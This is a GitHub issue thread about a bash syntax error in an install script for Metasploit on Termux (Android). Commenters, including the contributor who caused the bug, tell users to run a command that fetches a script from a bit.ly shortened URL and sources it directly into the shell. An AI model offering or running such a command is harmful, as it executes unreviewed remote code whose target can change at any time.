### ISSUE TITLE
./metasploit.sh: line 101: syntax error near unexpected token `then'

### ISSUE THREAD

**Issue by bot2471** [gushmazuko/metasploit_in_termux#170]
**Important**
Do not duplicate, search your issue before creating one!

**Describe the bug**

**Screenshots**

**Smartphone (please complete the following information):**
 - Device: Realme X3 superzoom 
 - OS: Android 11

**Comment by xFm512** [comment]
Use this command:
`source <(curl -fsSL https://bit.ly/3cTWx5g)`

**Comment by krisdowis** [comment]
This was my mistake I made an error while contributing to the code but I already opened a pull request to fix it The owner hasn't approved yet because he is busy but you can fix with this command for now
 ```
source <(curl -fsSL https ://bit.ly/3cTWx5g)
```

Please note this is to fix the error for now I will remove/disable the link once owner approves pull request or fixes error

Please let me know if you were able to fix the problem or if you still have errors

**Comment by CUTE-VENOM** [comment]
> Use this command: `source <(curl -fsSL https://bit.ly/3cTWx5g)`

after I Entered this it showing symbol like:
'>' what to enter now can you explain?
![IMG_20220805_192011](https://user-images.githubusercontent.com/98949898/183091141-ed26bd0e-ce1d-430f-b888-37832e7698c3.jpg)

**Comment by krisdowis** [comment]
> > Use this command: `source <(curl -fsSL https://bit.ly/3cTWx5g)`
> 
> after I Entered this it showing symbol like:
> '>' what to enter now can you explain?
> ![IMG_20220805_192011](https://user-images.githubusercontent.com/98949898/183091141-ed26bd0e-ce1d-430f-b888-37832e7698c3.jpg)
> 

You didn't end with )
